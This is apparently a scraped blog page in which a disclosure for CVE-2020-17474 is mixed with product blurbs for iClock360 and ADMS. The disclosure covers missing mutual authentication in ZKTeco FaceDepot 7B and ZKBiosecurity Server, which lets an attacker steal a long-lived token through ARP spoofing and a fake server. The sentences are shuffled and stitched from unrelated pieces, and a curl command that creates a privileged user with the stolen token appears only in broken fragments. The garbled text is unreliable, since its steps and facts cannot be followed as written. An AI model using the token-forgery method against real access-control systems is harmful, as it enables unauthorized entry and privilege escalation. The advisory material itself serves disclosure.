Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.CWE-295: Improper Certificate ValidationĪn attacker who is able to sniff the network or arp-spoof with a fake server obtains a long-lasting token.CWE-613: Insufficient Session Expiration.H 'Content-Type: application/push charset=UTF-8' -H 'Content-Language: zh-CN' the content of is: user uuid= cardno= pin=11111 password= group=1 starttime=0 endtime=0 name=Bugoy Test1 privilege=14 disable=0 verify=0 Vulnerability Type b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \ Server port: It is the communication/ADMS port number How to see your PC/Server Address of your software Click on the windows start button. FaceDepot tablet reconnects to the server every 2 - 3 minutes and thus automatically submits a legit token.Īfter SN and token are obtained, it is easy to, for example, create a user, by using cURL: curl -v -L -X POST -A 'iClock Proxy/1.09' '' \ iClock Automatic Data Master Server, free download. After taking over ZKBiosecurity Server's IP by arpspoofing, the script is able to obtain the token for further use. We did not install the CA into the tablet. We wrote a proof-of-concept to simulate ZKBiosecurity ADMS with reasonably dummy response. The token can be used in replay attack, command forgery, arbitrary user addition and privilege escalation (CVE-2020-17474). Moreover, the token has a long life (at least 2 weeks), and is still valid even after FaceDepot 7B (the Android tablet) issues a new token. Wireshark the default deployment, which does HTTP instead of HTTPS.Use a Python script (zkteco.py, see below) and a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS) and do ARP spoofing on HTTPS port 8088.The researchers have tried two ways to successfully steal the access token in the HTTP header. The update can be found via the vendor's link: The vendor addressed the vulnerability and has recommended to install an updated version of the software. The responsible disclosure expired on April 30, 2020. It also supports data backup and retrieve to avoid the risk of accidental deletion. iClock360 is compatible with various types of USB flash disks, ADMS and former SDK. Most importantly, all the functions can still operate in a networking state. ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The devise iClock360 easy to network via RS232/485, TCP/IP, and USB client which is relaible for user. The vulnerability has been submitted to ZDI on Dec 3, 2019. Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |